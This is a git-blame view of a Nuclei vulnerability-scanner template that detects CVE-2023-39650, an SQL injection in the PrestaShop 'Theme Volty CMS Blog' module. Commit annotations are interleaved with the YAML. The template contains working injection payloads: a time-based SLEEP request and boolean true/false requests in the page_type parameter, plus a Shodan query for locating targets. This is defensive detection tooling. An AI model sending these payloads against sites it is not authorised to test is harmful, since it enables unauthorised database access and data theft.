daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-39650.yaml

76 lines
2.5 KiB
YAML
Raw Normal View History

Update CVE-2023-39650.yaml
2024-09-19 08:22:48 +00:00
id: CVE-2023-39650
info:
name: PrestaShop Theme Volty CMS Blog - SQL Injection
author: mastercho
severity: critical
description: |
In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
reference:
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39650
cwe-id: CWE-89
epss-score: 0.04685
epss-percentile: 0.91818
metadata:
Update CVE-2023-39650.yaml
2024-10-18 13:02:34 +00:00
max-request: 4
Update CVE-2023-39650.yaml
2024-09-19 08:22:48 +00:00
verified: true
framework: prestashop
shodan-query: html:"/tvcmsblog"
updated to time-based-sqli
2024-10-15 10:27:37 +00:00
tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog
Update CVE-2023-39650.yaml
2024-09-19 08:22:48 +00:00
Update CVE-2023-39650.yaml
2024-10-18 13:02:34 +00:00
flow: http(1) && http(2)
Added CVEs
2024-09-12 08:55:38 +00:00
http:
Update CVE-2023-39650.yaml
2024-10-18 13:02:34 +00:00
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
Fixed FalseNegative on tvcmsblog CVE
2024-10-20 02:44:44 +00:00
- 'contains_any(tolower(response), "prestashop", "tvcmsblog")'
Update CVE-2023-39650.yaml
2024-10-18 13:02:34 +00:00
internal: true
Added CVEs
2024-09-12 08:55:38 +00:00
- raw:
- |
@timeout: 20s
Update CVE-2023-39650.yaml If the server outputs the full uri to the body tvcmsblog and the match is easy, it is equivalent to judging only that the time match is too weak
2024-10-12 15:37:14 +00:00
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(8)))oqFL)--+yxoW HTTP/1.1
Update CVE-2023-39650.yaml
2024-09-19 08:12:01 +00:00
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
@timeout: 20s
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
Added CVEs
2024-09-12 08:55:38 +00:00
Host: {{Hostname}}
Update CVE-2023-39650.yaml
2024-09-19 08:12:01 +00:00
Origin: {{BaseURL}}
Added CVEs
2024-09-12 08:55:38 +00:00
host-redirects: true
matchers:
- type: dsl
name: time-based
dsl:
Update CVE-2023-39650.yaml If the server outputs the full uri to the body tvcmsblog and the match is easy, it is equivalent to judging only that the time match is too weak
2024-10-12 15:37:14 +00:00
- 'duration_1>=8'
Update CVE-2023-39650.yaml
2024-09-19 08:12:01 +00:00
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
condition: and
- type: dsl
name: blind-based
dsl:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
Added CVEs
2024-09-12 08:55:38 +00:00
condition: and
chore: sign templates 🤖
2024-10-22 08:58:44 +00:00
# digest: 490a0046304402204cb71fbf7481ceef3f0d927c3774d07ed82cfd448fc897d65a0fd88c154d643e022040b7e1c42c335323c7fac2799ee2878d3f82121f12c36242021836a7b61d0046:922c64590222798bb761d5b6d8e72950